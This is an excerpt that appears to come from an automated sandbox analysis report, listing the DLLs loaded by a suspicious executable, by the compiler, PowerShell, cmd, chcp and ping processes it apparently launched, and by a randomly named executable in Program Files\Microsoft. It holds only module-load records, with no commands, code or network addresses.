                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: version.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: cryptbase.dll
